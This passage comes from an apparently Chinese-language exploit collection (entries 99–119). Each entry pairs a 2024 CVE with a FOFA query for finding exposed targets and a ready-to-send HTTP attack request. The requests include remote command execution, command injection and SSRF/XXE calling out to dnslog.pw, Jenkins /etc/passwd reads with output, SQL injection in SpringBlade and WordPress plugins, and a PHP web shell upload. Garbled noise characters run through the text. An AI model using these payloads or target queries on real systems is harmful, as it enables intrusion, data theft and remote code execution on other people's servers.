+ b( o+ K7 r D! S1 H [6 t; U; nAccept-Encoding: gzip, deflate# l+ o& H3 ]( g2 ~% ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 B% S( o) I; E# FContent-Type: application/x-www-form-urlencoded; charset=UTF-8* @/ W) P+ D4 X; Q) z
X-Requested-With: XMLHttpRequest
i- [2 `: p; ?4 ^+ l; f# u
( W3 J% d; d' n! yid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
9 K; V/ m/ k. f# a3 Y
5 f- L t; P$ |0 w9 |
- V- M# U3 V6 `4 P+ R8 z7 D99. Ncast盈可视高清智能录播系统busiFacade RCE! U! `5 w0 b+ i* \1 |$ q
CVE-2024-03059 a. W1 H. k7 B: ?) f* d
FOFA:app="Ncast-产品" && title=="高清智能录播系统" [+ B" T, b( p8 w0 }& P2 j. | v0 R
POST /classes/common/busiFacade.php HTTP/1.1
( i, w) y5 i% d! ^ \) y# j! \Host: 192.168.40.130:8080
6 w; ^: n8 B1 }) z3 [ {, t/ U) CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) |! X- ~$ l6 _2 h$ K
Connection: close2 B: k5 g2 R7 }: p1 l' |
Content-Length: 154
n* t ~( ` y7 [0 B" w. ]; E( t9 |Accept: */*
3 J: P; Q) w' p, L2 j* Q$ Y5 [Accept-Encoding: gzip, deflate
% \7 s% V d" p* J: W' eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 F! X' Z4 e$ U5 z6 x# n$ A/ N2 XContent-Type: application/x-www-form-urlencoded; charset=UTF-8
! s' N, P/ C" V! g5 M& V% @5 n4 CX-Requested-With: XMLHttpRequest- a- b3 c1 |0 m6 K
( I! D; o8 T/ k5 L! v* U
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D4 R: T( t7 q6 {# ~! L
# `' B6 v5 i' I- ?. Z! i& y
; l, Y, o, P" _6 K* W: x9 j
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
! f' L; L1 Z- B1 ~$ W7 l- f: nCVE-2024-0352
4 k: ]# q) G3 r" w: wFOFA:icon_hash="874152924"
" q: E O1 U) v! u$ z. d. qPOST /api/file/formimage HTTP/1.16 A$ \9 c0 @ j- |4 ?3 D3 Y/ K) \7 }8 d& I
Host: 192.168.40.1303 O* }6 {* Y8 w; {/ ?) A; R6 s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 S- u4 t2 D" D$ H$ l) t8 n5 U
Connection: close
: O3 N' |3 J: {' NContent-Length: 201
9 p6 ^. v5 V* U9 k5 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei" V+ ?3 P1 U% G$ L, u- {# e. f
Accept-Encoding: gzip0 d3 t% b" v& ?8 \; O
4 I9 i3 [* ~& _. `1 A! T
------WebKitFormBoundarygcflwtei L4 _6 M8 k' W* N$ i
Content-Disposition: form-data; name="file";filename="IE4MGP.php"4 J [# q' V# }; I6 V1 Q
Content-Type: application/x-php
/ ?1 K# N- P! g+ o' n
) k5 q; n! M; X# M& U2ayyhRXiAsKXL8olvF5s4qqyI2O
8 q D. f( T: Q------WebKitFormBoundarygcflwtei--
. ^, X9 \ q: ]# X+ f; n# C s' c6 f: D Q: t; n/ {
. l9 K# U! b9 d8 ?8 z% X! t2 h101. ivanti policy secure-22.6命令注入
8 U* d' n; ?1 _ U) v: jCVE-2024-21887
( ^: ]0 y6 E& `) f$ w; K. YFOFA:body="welcome.cgi?p=logo"
7 b2 Y; T5 q7 pGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
' c2 }% y- V. THost: x.x.x.xx.x.x.x
6 l2 s6 v" ]( c: j0 s- e4 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 t1 n( b# e% E( U
Connection: close5 U7 M1 D9 y1 M1 H' A
Accept-Encoding: gzip0 n/ p) o; d9 G4 V$ }
1 \0 C3 q5 ]8 t; \( I1 C1 D/ k; O$ {5 O$ _$ t+ Q8 k) [$ N q4 E
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行8 ^' _, n! U+ [' s% O
CVE-2024-21893" a( I+ j& s, ]
FOFA:body="welcome.cgi?p=logo"
2 K3 W- T& c5 LPOST /dana-ws/saml20.ws HTTP/1.1
' f% {0 D) _9 u4 K, THost: x.x.x.x6 Q1 W. x& z6 q9 m' i' N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 j6 l1 M B5 a. L) a( G ~Connection: close
5 L0 Y% l- B: f4 O2 k9 ?Content-Length: 7921 K3 H# o. W& m7 v0 r1 z
Accept-Encoding: gzip
1 U0 K" U, h; K; d3 K! f, g: Y/ s4 ]* o- e4 V* R# L+ d) o
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope># o# \' W& R) o# p# B! }; m
+ x' T$ f# [/ M% A2 a: t
103. Ivanti Pulse Connect Secure VPN XXE
6 w% n R4 P7 _: v6 M B5 J) tCVE-2024-22024# S6 C' I |$ N
FOFA:body="welcome.cgi?p=logo"; T- G8 i) r# ]9 L. x" d
POST /dana-na/auth/saml-sso.cgi HTTP/1.1: i" {4 f0 w# ^, F
Host: 192.168.40.130:111& r4 y' o& _! h# [5 g
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36' y# ]1 V! s1 _3 O
Connection: close
8 X' T) h5 w* IContent-Length: 204
% }1 s6 G$ O% u: U; U% t- n0 VContent-Type: application/x-www-form-urlencoded8 q* H5 Y4 B D6 v( i
Accept-Encoding: gzip
4 \! ?# Q( X" |8 R* C# b# M3 M) g* B+ M. h$ \! ^2 Y4 S
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
' Q+ f) @4 U0 k
1 W- ~$ ~5 a/ g: x% x6 r, a( K, V5 ^! f6 d4 y0 i
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
. Y% L( y% |5 x) c+ z$ r$ Y<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
; ~8 ~7 g( v" u6 K: G
{8 g, k5 g$ N) p$ s4 ]6 d! _& j h5 [8 v% e: p6 X
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 i. E) i1 m4 H+ `# v8 U8 N/ dCVE-2024-0569
" U0 ]" Z* p3 |. N/ \/ a0 nFOFA:title="TOTOLINK": w% R7 U, o8 r, w, l5 f; ~% S
POST /cgi-bin/cstecgi.cgi HTTP/1.1) T! O# L! A) z% U* S/ n' b
Host:192.168.0.1- I7 E) X% Q' J5 p
Content-Length:41
% D; e+ q4 V7 I0 N' J* ]Accept:application/json,text/javascript,*/*;q=0.013 u- c n: [& R5 C' j# a
X-Requested-with: XMLHttpRequest8 U7 L5 y) C6 o. u
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
1 ]1 m1 y# ? _Content-Type: application/x-www-form-urlencoded:charset=UTF-8( P# a: v9 U& s2 R+ |- S# z/ q
Origin: http://192.168.0.1& @! C& F0 U: @; E# o1 l% a
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
* `& l) V$ t( \. _7 g u7 |# RAccept-Encoding:gzip,deflate- Z: A) E, C5 a C& d" \. Y
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7: ]' P j4 n6 T1 W4 Y
Connection:close
* G' h. ^1 z) W
: b1 T, w* n8 r5 _{
7 n+ `/ B; L, c- n$ D; m"topicurl":"getSysStatusCfg",5 n& Z4 f7 W9 k0 U& F
"token":"" D& K* x1 T& C" J6 M
}
. O5 [4 |0 O, P S8 g3 ^
5 P6 i& f8 X6 w105. SpringBlade v3.2.0 export-user SQL 注入
4 N$ |: Y$ l" p1 n" rFOFA:body="https://bladex.vip"
2 x2 c, `0 }! \" Qhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1; }: E; Q/ w; G( Q6 W0 _) `( b3 D" x" I
1 u; l3 p5 \0 ~/ h- C
106. SpringBlade dict-biz/list SQL 注入! i! O4 |7 e8 p( ]2 S+ Q! X' ~, E, m6 c
FOFA:body="Saber 将不能正常工作"
' z6 l1 \9 }4 i; L" ^; x: H& |GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. `. i/ T* n6 v% g* `- P4 W; G6 [, r
Host: your-ip6 A" V$ B& p: a6 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, m( |# {4 x# x3 N
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A$ @; s+ t: L2 {/ `0 Y. X
Accept-Encoding: gzip, deflate
1 L/ a( z$ N# N) \ u7 o, [Accept-Language: zh-CN,zh;q=0.9. x* _' D1 r* Z' b' {8 n
Connection: close. Q) g1 ]$ V/ M% L
$ z# F# O7 q Y- W5 Q2 _" \# f) t, O. }- r0 b
107. SpringBlade tenant/list SQL 注入9 A9 f \* }! r: c5 K1 d5 r
FOFA:body="https://bladex.vip"9 m* E/ z* m" c8 G: z
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* L9 G% h- S( p% T
Host: your-ip
, K$ E& Q* a& M$ ?8 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( H& y6 i* L6 S- g5 D, T: |
Blade-Auth:替换为自己的7 w7 u8 Q8 w9 v/ v
Connection: close1 M0 i4 E8 z6 S7 `- t& ^" P
. l9 F' T1 c# _% w8 k# [# _
- _9 }4 d6 I- J( z* N108. D-Tale 3.9.0 SSRF3 ?3 D" g( ~5 e* H9 |& z8 ?
CVE-2024-21642/ P, i R: d! Z/ {% B- l' ~
FOFA:"dtale/static/images/favicon.png"1 j* ?/ _2 s0 s4 ^/ r0 [, J1 X
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1! ~/ J, M4 l/ {3 I; }4 Y+ u
Host: your-ip; }5 Y6 o; A! g5 M$ t
Accept: application/json, text/plain, */*4 b! p- i6 f. ~& `' R9 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 X+ `' h0 A. w+ _Accept-Encoding: gzip, deflate: p0 ~$ a! H9 m# D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 z2 o" C# d- EConnection: close
0 }. x X$ ^6 j; K" ]0 m8 S0 m# L; T! N
0 P4 R! M9 U0 `) S/ e/ X1 H/ R
109. Jenkins CLI 任意文件读取
. t0 m, U* H% U, ^) RCVE-2024-23897
$ U c% U: d# q6 l' n5 j% uFOFA:header="X-Jenkins"
3 o7 W4 x, o9 d7 t3 ^! e) TPOST /cli?remoting=false HTTP/1.14 S1 R8 e7 g Q: `' f! C, q- a
Host:
( B( r/ `, G4 i/ U, d! `' qContent-type: application/octet-stream; Z. G- U9 U& e( {
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ y2 R/ K. {# G( I! cSide: upload
4 N4 n9 h9 w, q& X- XConnection: keep-alive, ~: O2 ~/ p/ v4 c4 @
Content-Length: 163
; Z) h; a d9 M e
/ z+ N% f) v0 q$ b6 a0 S; }6 Z( gb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
/ t! K Y- J+ P. W0 }9 _" @' l! \: r# e
! B5 p1 b* c/ D/ S% h, S. y
POST /cli?remoting=false HTTP/1.14 Q; E- F8 J% E: P
Host:
8 j" `8 r3 i. M& T& |/ ^& c% h8 z+ XSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 ^, P3 @0 n, E1 q0 e5 g6 e: fdownload
$ {0 l" u4 V/ B) T3 N, a, yContent-Type: application/x-www-form-urlencoded
/ P. |. y1 {7 c {& N1 t3 r7 NContent-Length: 03 f. U/ S& N4 _/ E% }; ]
. x, Y/ n4 W$ p- d
6 c/ T9 ~# N$ B- r, Q" e0 H% xERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 |+ F$ @( r$ i/ @java -jar jenkins-cli.jar help' [ {; v+ ^) y5 V: A5 z
[COMMAND]% C- M2 l8 b) ~
Lists all the available commands or a detailed description of single command.$ c F: [! t z6 e
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
7 B6 A% E. l3 d/ K
! S+ A# g w% \% k; G R) l3 W; J! y {! y
110. Goanywhere MFT 未授权创建管理员+ S7 ^1 x6 f! x& D- z _" r
CVE-2024-0204* A6 g m/ K) {7 o( q
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
# c% q+ N+ D( j) vGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" u2 z+ m3 o8 J: P. L% B
Host: 192.168.40.130:8000, P& d$ f D" D6 ~$ u' L1 @# J5 ^
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36; p( W3 L5 I, F! S% U$ v7 q8 K
Connection: close
4 j; S3 Y( ^; h. p4 }/ bAccept: */*; B+ R O0 a0 n, I( z
Accept-Language: en6 F6 K* O" U/ k; }, n
Accept-Encoding: gzip5 x W; p% e( w! h9 z, |3 V4 E$ [
. r+ X/ n, p3 n/ ^; j. d& o9 S# z6 f7 t
111. WordPress Plugin HTML5 Video Player SQL注入
# g. S' i; Y5 B+ y5 RCVE-2024-10615 k4 {9 o r* `! f# P& |
FOFA:"wordpress" && body="html5-video-player"; E( k2 }2 f# ^- Q; E& n
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
, d4 c$ ~3 [: d- r& V, P# {4 E' a2 VHost: 192.168.40.130:112+ m" o! N* H$ `% G! l3 ~8 @1 u. x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. Y) l: t/ B8 _; _) a0 L2 Q, c4 h4 pConnection: close5 }- I C* r7 V6 j8 e: H, e9 e6 U
Accept: */*
: M0 O7 \3 l2 z% u7 lAccept-Language: en) f( t @, c' S* f5 Y$ T1 C
Accept-Encoding: gzip R/ N# I) m! x2 s ]# i8 [3 e
( ^7 J: P n6 A4 R' f4 {- O, y4 z( }/ l% c) R6 O# E8 n' ?: _
112. WordPress Plugin NotificationX SQL 注入
+ B, G& W4 L( b* `( v/ \* TCVE-2024-1698& d5 r0 q3 M, A, R" K3 X) o/ \+ M
FOFA:body="/wp-content/plugins/notificationx"/ c# v1 D. z( V9 c; d& ?
POST /wp-json/notificationx/v1/analytics HTTP/1.18 ~, o9 K8 r; f4 z& \
Host: {{Hostname}}
4 y6 ]9 M: f# w3 _Content-Type: application/json
7 \& _5 ^; f* a
6 `& L% H7 ]- _, b{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}$ j6 O+ `- a; o; _
) b" \& Z8 g/ s1 o
% s2 k2 E6 J/ f7 m0 J
113. WordPress Automatic 插件任意文件下载和SSRF$ z& _5 G0 G# `3 k6 z1 s/ k; m
CVE-2024-279540 U! N& ^2 g8 n, g
FOFA:"/wp-content/plugins/wp-automatic"
2 J. ?3 W2 w7 z, q8 G$ P! U( _5 g% qGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
; P' @5 ^( c. \Host: x.x.x.x2 o) O" {/ I: |. v
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 [ H' [" s) c9 f3 O7 ^Connection: close0 G& {0 t! _+ `- a7 \6 d) B* ?$ g6 a
Accept: */*& v: p2 d! w: t& h$ c8 n
Accept-Language: en8 m& O# Z5 `4 m
Accept-Encoding: gzip$ b# Y, ]2 R* _0 J5 p$ O/ w
) M9 }0 Y8 a. G* ?" e! l
, p; n* Q) H4 S114. WordPress MasterStudy LMS插件 SQL注入8 F8 U2 [3 v+ E# p/ o2 z6 X6 h$ D
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
8 D. L, V% _ a+ N5 yGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 ]" K- H1 Q+ H! Z4 {5 i6 ]/ }
Host: your-ip& |' \! c% t/ J0 B
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 C$ u4 g) e) \3 Y: I$ |/ o9 w
Accept-Charset: utf-8' b3 W) J8 d5 h
Accept-Encoding: gzip, deflate4 T* f# H$ G1 Q
Connection: close% W0 p5 z7 @7 }; \* J7 E
6 x7 p/ z) \) Q { A: K! D' N1 x" f* I$ G: @% l) ]2 N" w( Q% V
115. WordPress Bricks Builder <= 1.9.6 RCE% @8 T j. |/ S# M& K+ b0 }7 _# n$ L
CVE-2024-25600- n; E3 N! z/ z% P
FOFA: body="/wp-content/themes/bricks/"; Q- h! d1 N) `: I3 j" W
第一步,获取网站的nonce值8 I$ T$ M( o# r; L9 k! c$ i( N
GET / HTTP/1.1. r; l. e0 `) W# e" ^& ^
Host: x.x.x.x
! N' R" D, p- t* F% ?7 sUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 H: C! Z, W( m+ q" J9 W H
Connection: close
" d9 g* h( j0 ~; b; LAccept-Encoding: gzip, A' L3 G& w( y
- |& n- y; h1 U, S8 v- Y
2 {% h! A" G# P5 E7 W7 T# C
第二步替换nonce值,执行命令
+ {' u: G7 Z7 `POST /wp-json/bricks/v1/render_element HTTP/1.1
7 }3 F; n4 `) Z% a' aHost: x.x.x.x, E& t4 N2 b' F6 [$ Q4 F+ f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% Y C9 f& ^1 x6 NConnection: close& y* w+ o# t# i/ I
Content-Length: 356
$ j% n! O+ H5 k& Z* `Content-Type: application/json
! [. f2 B3 n5 ~Accept-Encoding: gzip; c5 Y5 T( L3 ^
& C. d& J9 @: F& j
{8 E7 K+ w; E; _/ g! f
"postId": "1",* c& ?, T5 U; Q3 d" J
"nonce": "第一步获得的值",' Y6 O' v6 x( Q. F. b0 a
"element": {
) E! L! e2 Z: a+ O- U4 |4 E; Y% ~ "name": "container",
# x m+ A) X0 k3 p1 ?9 x; X& g "settings": {
1 Z. f' O" A( }. H) P' R: k+ b0 v "hasLoop": "true",
9 @& [5 S. g1 L6 ~5 b$ g8 | "query": {
" c% S# _" m3 Z; [5 u "useQueryEditor": true,
( {* }" W3 c2 r, v. v' z "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 t5 n8 F/ H* y2 l( G$ D8 d "objectType": "post"& s& t* l. z$ O6 ~0 K( D
}3 b- B; B5 p+ _0 _5 }* r3 Z2 W3 ^
}. ?! z0 Z" t/ y- C4 f6 ]/ {1 o
}; Y. y: K" o% [+ D% d1 I- f
}
. k9 {# M3 V- w; N6 M, ^
3 A+ a: K9 @2 r; c9 ^! ?
3 F2 \/ l1 i& M2 d6 C/ v116. wordpress js-support-ticket文件上传 l" T, O: c5 F, ?: l; L
FOFA:body="wp-content/plugins/js-support-ticket"* h r1 u) B2 g" M t. P3 i
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.12 ~: h r) R$ y. j
Host:. [, ~8 v1 o4 A% o- V' ~% w
Content-Type: multipart/form-data; boundary=--------767099171; H9 M7 b9 B9 }& {" i
User-Agent: Mozilla/5.0
$ U D ~- U$ N5 T- A' T. [
, E2 r8 C9 { o {1 G----------7670991719 J5 _9 k/ N9 G& _! N' }
Content-Disposition: form-data; name="action"
9 B# }7 H/ o8 Z8 pconfiguration_saveconfiguration
& N0 @( e1 ?+ Z; m----------767099171
/ z8 u" i" o9 i ^2 {" D- UContent-Disposition: form-data; name="form_request"
9 Z3 `% f3 O4 ]6 ]2 @. _. ajssupportticket1 o/ H' S5 H$ u# h2 L @+ _# N0 E
----------767099171* i. M9 `& A. H! Q
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 r7 q; H" p' k! D
Content-Type: image/png
" H0 ]# J0 Q7 J- b5 x----------767099171--3 |+ z% x' t W0 c0 k3 l
& |: C; \! v0 Y8 d: Z
& E8 o' ]) b8 P% F' Q s
117. WordPress LayerSlider插件SQL注入
( E8 j, J- Y: O; Lversion:7.9.11 – 7.10.0
, X9 E- J W5 U6 h9 c2 f( c5 k' QFOFA:body="/wp-content/plugins/LayerSlider/"
1 u0 K) x5 w+ m* F% g8 [/ sGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
$ q9 Y6 C ~5 ^- R; n" P' ~1 MHost: your-ip5 {/ J9 M8 u$ w& P; c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
L' C- b7 x+ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, v1 x& r7 G* B0 [0 K' ?2 U/ G/ F3 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& R9 B( A8 [( S% Q. z5 g$ V' X
Accept-Encoding: gzip, deflate, br
* k- e/ ^: O5 |5 ]! e9 `) V. uConnection: close8 ~3 `5 r: i/ J# o5 W: `7 h
Upgrade-Insecure-Requests: 17 ^7 v5 q* _; }: e& o
/ H# M% E, x: C( \
4 L" M/ ~3 P! S6 P118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: W) \0 ~8 ?0 M! o( @: S7 h0 @$ u `) cCVE-2024-0939
2 N; ?# }9 e) x0 Z# G) |7 T* {FOFA:title="Smart管理平台"0 H5 U6 D" X) L1 K0 q o
POST /Tool/uploadfile.php? HTTP/1.1. e+ C7 { Y% V
Host: 192.168.40.130:8443$ [- ]# Z) t' J, g3 A+ ^7 v( N
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
- v" {3 a8 g, R3 w( W7 c6 X: TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0. Y! H7 t9 P2 t0 q+ h7 { f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- E& l; }6 P* O/ |5 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 E2 z" F% t+ h" h% t3 I. ~Accept-Encoding: gzip, deflate
6 C$ {/ I7 o+ O0 }( e# sContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887( Y' l. b$ U" ]/ {$ K
Content-Length: 405
+ _! Q8 H8 _5 M; B* G' V- M1 d0 C" ~8 jOrigin: https://192.168.40.130:8443
?& d% f+ q: a2 ^Referer: https://192.168.40.130:8443/Tool/uploadfile.php
7 b1 H8 N( N8 G; HUpgrade-Insecure-Requests: 1
) e; s* R$ ]. |+ _3 ] CSec-Fetch-Dest: document0 g0 ~3 `; k/ Q/ u) T/ q; M
Sec-Fetch-Mode: navigate/ h$ Y3 F2 m2 p. |
Sec-Fetch-Site: same-origin- V+ c# P9 a5 q
Sec-Fetch-User: ?1* k9 B" g: V h
Te: trailers. K* v! Z, |- e7 V. v
Connection: close
" d, N7 _4 {1 A0 L. H5 w9 u7 E0 @, \; y) W9 V; w3 b" r
-----------------------------13979701222747646634037182887
* y8 D- j7 `6 k9 ^: X c/ c XContent-Disposition: form-data; name="file_upload"; filename="contents.php": Y% p) G6 T7 Q9 o6 [1 v0 ^* u" {
Content-Type: application/octet-stream
# b* {0 @2 a/ c0 M
?6 v9 Q+ G/ ?8 ]) Z" j0 K; }<?php* F- R7 O9 R% P/ M4 d
system($_POST["passwd"]);& `& O: F% H1 X [$ T
?>
9 p! e. O6 F2 t( K-----------------------------13979701222747646634037182887
: O1 d1 T; g: y& h/ W' b. }1 HContent-Disposition: form-data; name="txt_path"! [ j! j- u2 D) y7 n9 |( o
& U1 _/ `5 @$ U# J' K( h3 Z
/home/src.php" ?; h! E- g/ ?4 @2 k' r3 P
-----------------------------13979701222747646634037182887--/ x2 z3 j( Y+ Q @: l" ^+ `. V
_4 s3 Z+ E9 T. ] ~2 g0 n
( O0 K4 \3 R! f" `3 c5 `9 }访问/home/src.php J& T5 x* v, g- V \8 p& Y! a
+ T% W# H* C8 r5 ?9 e119. 北京百绰智能S20后台sysmanageajax.php sql注入
/ i* ^& n9 @1 q* pCVE-2024-1254
5 w3 ^9 \. y. ]FOFA:title="Smart管理平台"7 E1 ?4 I/ Z; X
先登录进入系统,默认账号密码为admin/admin: J) ^$ v3 O3 \ A* W5 K! G8 E
POST /sysmanage/sysmanageajax.php HTTP/1.11
L7 M0 \& D5 r1 THost: x.x.x.x- D" X z3 T. V4 r
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
/ {2 z7 |! z0 G& |$ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; N& A' z5 J$ F) ^7 Z" O
Accept: */*+ E1 b7 B7 @7 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 Q: n5 |% N# ^* t
Accept-Encoding: gzip, deflate
$ @. u6 w# m/ M3 O. qContent-Type: application/x-www-form-urlencoded;
1 ?9 Z9 ?. L( t+ fContent-Length: 109
' g, @6 P* |6 T/ ?4 u, v8 q8 s" zOrigin: https://58.18.133.60:8443
5 G# E% i; {1 l% v- u+ Z8 JReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php+ t9 V; B. F+ V
Sec-Fetch-Dest: empty; c( V! ~, s1 {$ W. h
